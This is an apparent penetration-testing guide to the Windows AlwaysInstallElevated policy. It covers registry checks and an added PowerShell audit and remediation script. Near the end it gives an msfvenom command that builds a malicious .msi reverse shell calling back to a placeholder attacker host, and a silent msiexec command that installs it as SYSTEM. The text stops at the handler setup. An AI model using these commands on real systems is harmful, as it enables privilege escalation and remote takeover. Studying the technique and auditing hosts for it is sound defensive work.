AlwaysInstallElevated

The AlwaysInstallElevated policy can be enabled to allow installation of a Windows Installer (.msi) package with elevated (SYSTEM) privileges, regardless of the privileges of the user who runs the installer.

This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.

To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to 1 under both of the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

The following commands can be used to query the values:

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
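As an added defender-side check (example code, not part of the original page), the following PowerShell script reads the AlwaysInstallElevated value from both policy keys, reports whether the policy is fully active (only the case when both values are 1), and can optionally reset both values to 0. The function name and the -Remediate switch are my own; writing to the HKLM key requires an elevated shell.

```powershell
# Added example: audit (and optionally remediate) the AlwaysInstallElevated policy.
# Not from the original page; function name and -Remediate switch are assumptions.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param(
        # When set, writes 0 to both keys where the value exists (needs admin for HKLM).
        [switch]$Remediate
    )

    # The two registry keys named on the page, in PowerShell provider notation.
    $paths = @(
        'HKCU:\Software\Policies\Microsoft\Windows\Installer',
        'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    )

    $results = foreach ($p in $paths) {
        $value = $null
        if (Test-Path -Path $p) {
            # $null when the key exists but the value does not.
            $value = (Get-ItemProperty -Path $p -Name 'AlwaysInstallElevated' `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Path = $p; AlwaysInstallElevated = $value }
    }

    $results | Format-Table -AutoSize

    # The policy is only effective when BOTH values are 1.
    $enabled = @($results | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq $paths.Count
    if ($enabled) {
        Write-Warning 'AlwaysInstallElevated is enabled in HKCU and HKLM: any user can install MSI packages as SYSTEM.'
    } else {
        Write-Output 'AlwaysInstallElevated is not fully enabled on this host.'
    }

    if ($Remediate) {
        foreach ($r in $results | Where-Object { $null -ne $_.AlwaysInstallElevated }) {
            Set-ItemProperty -Path $r.Path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
            Write-Output "Set $($r.Path)\AlwaysInstallElevated = 0"
        }
    }

    return $enabled
}

# Usage: audit only, or audit and reset from an elevated prompt.
Test-AlwaysInstallElevated
# Test-AlwaysInstallElevated -Remediate
```

The function returns $true only when both values are 1, so it can be dropped into a wider baseline script; the same condition is also what the attack described below depends on, which makes it a useful host-hardening check to run at scale.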

If both values are set to 1, a malicious .msi file can be created (for example with msfvenom) that starts a reverse shell with administrative privileges when installed.

Attacker machine

msfvenom -p windows/x64/shell_reverse_tcp lhost=[attacker_ip] lport=[port] -f msi -o malicious.msi

The .msi file can be executed on the target machine with the following command:

C:\> msiexec /quiet /qn /i [path_to_msi_file]

# e.g.
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

The Metasploit handler should be started on the attacker machine:
